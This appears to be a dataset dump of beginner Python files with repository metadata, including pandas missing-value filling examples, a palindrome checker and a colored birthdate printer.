df["Age"].fillna(df["Age"].groupby(df["Gender"]).transform("mean"),inplace=True)
print(df)
#方式二
df["Age"].fillna(df.groupby("Gender")["Age"].transform("mean"),inplace=True)
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
#向后填补缺失值
# df.fillna(method="pad",inplace=True)
# print(df)
#向前填补缺失值
# df.fillna(method="bfill",inplace=True)
# print(df)
#在向前填补缺失值时,只填补一行
df.fillna(method="bfill",inplace=True,limit=1)
print(df)
df=pd.DataFrame([[1,870],[2,900],[np.nan,np.nan],[4,950],[5,1000],[6,1200]])
df.columns=["Time","Value"]
print(df)
#使用内插法填补缺失值
print(df.interpolate()) | [
"jeff.xinsc@gmail.com"
] | jeff.xinsc@gmail.com |
e9b3f8973d911ceb5d48ec19e663a81368493195 | f343b2ac4f5b52abd5e6a8fb6bef55acf3a32154 | /solutions-BEWARE-DO-NOT-ENTER/week-4/takeHomeChallenge-palindrome.py | e4a2ccdfe7f0be3a40c21436e6c20987ccb1f2fa | [] | no_license | asyrul21/recode-beginner-python | 41248d59199ac3660ef40aa3a5fdf23fadfb6b5b | 93608e2880aec1774e898d5f1a663dc84e246b46 | refs/heads/master | 2023-07-04T21:59:08.135443 | 2021-08-09T01:43:30 | 2021-08-09T01:43:30 | 330,307,505 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 944 | py | # The palindrome Checker
# 1. create a varible named word and assign it to the input() statement you learned last week
# 2. Transform this word to all lowercase by performing word.lower()
# 3. Set a flag named Palindrom and set it to True
# 4. Setup a for loop with enumeration, and check that the current letter must
# be equals to the letter at the same position from the bacl
# 5. If this is not true, you may change Palindrom to False, and break from the loop
# 6. Finally, if Palindrome is True, output something. Else, output a different message.
print("Welcome to the Palindrome Checker")
print()
word1 = input("Insert a word: ")
word1 = word1.lower()
palindrome = True
for idx, letter in enumerate(word1):
if word1[idx] == word1[len(word1) - (idx + 1)]:
palindrome = True
else:
palindrome = False
break
print()
if(palindrome):
print("This is a palindrome!")
else:
print("Nope this is not.")
| [
"asyrulhafetzy.21@gmail.com"
] | asyrulhafetzy.21@gmail.com |
13a7dfa407470abb9ca3c605120da264d916ae5d | 249c7081a766318360da21c66e7a30f917c90738 | /exercicio 2.py | c4a34ba0a76bc805393dd0d3128c0d2ff7cc3088 | [] | no_license | Danlei27/PycharmProjects | b4d93a966b45c84f206498faa60c36f8b356c5a9 | abedd9911d7a28f64366f4ea69de86ed16d39534 | refs/heads/master | 2020-05-30T10:32:55.793721 | 2019-06-01T00:33:27 | 2019-06-01T00:33:27 | 189,675,167 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | dia=input('dia')
mes=input('mes')
ano=input('ano')
cores = {'limpa':'\033[m',
'azul':'\033[34m',
'amarelo':'\033[33m',
'pretoebranco':'\033[7;30m'}
print('Você nasceu no dia' ,cores ['azul'],dia, 'do' ,mes, 'de' ,ano,cores['limpa'], '.correto?')
| [
"danleisantos@hotmail.com"
] | danleisantos@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.